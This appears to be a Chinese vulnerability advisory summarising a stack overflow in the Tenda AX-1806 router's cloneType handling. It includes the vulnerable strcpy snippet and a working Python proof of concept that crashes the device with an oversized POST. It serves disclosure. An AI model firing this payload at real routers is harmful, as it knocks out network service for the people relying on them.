# N/A
## 概述
Tenda AX-1806 v1.0.0.1 中发现存在栈溢出漏洞,位于 `sub_65B5C` 函数的 `cloneType` 参数处理过程中。
## 影响版本
Tenda AX-1806 v1.0.0.1
## 细节
漏洞存在于 `sub_65B5C` 函数中,对 `cloneType` 参数缺乏有效边界检查,导致栈溢出。
## 影响
攻击者可通过构造恶意请求触发栈溢出,造成拒绝服务(DoS)。
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: VulnbyCola/Tenda/AX-1806/10/1.md at main · 0-fool/VulnbyCola · GitHub -- 🔗来源链接
标签:
神龙速读:
### 关键信息摘要
- **厂商**: Tenda
- **产品**: AX-1806
- **版本**: v1.0.0.1
- [下载链接](https://www.tenda.com.cn/download/detail-3421.html)
- **漏洞类型**: 栈溢出
- **作者**: Shuhao Shen
- **电子邮件**: shenshuhao@hust.edu.cn
- **机构**: 华中科技大学 (HUST)
#### 漏洞原因
在函数 `sub_65B5C` 中,`cloneType` 值是从用户控制的输入中获取的,并复制到本地缓冲区 `v12`。`v12` 是一个固定大小的栈缓冲区(32 字节的 `char v12[32]`),而 `strcpy` 不对源字符串进行界限检查。当用户提供的 `cloneType` 参数值过长时,会导致缓冲区溢出,覆盖相邻的栈内存,从而可能引发程序崩溃或服务不可用。
#### 代码片段
```cpp
v4 = (const char *)sub_295C8(a1, "cloneType", "0");
strcpy(v12, v4);
```
#### PoC 攻击示例
使用以下 Python 脚本攻击:
```python
import requests
url = "http://192.168.20.12/goform/AdvSetMacMtuWan"
cloneType = "A"*7000
data = {
"cloneType": cloneType
}
r = requests.post(url, data=data)
print(r.status_code, r.text)
```
#### 结果
攻击后,目标路由器崩溃,无法正确提供服务。
暂无评论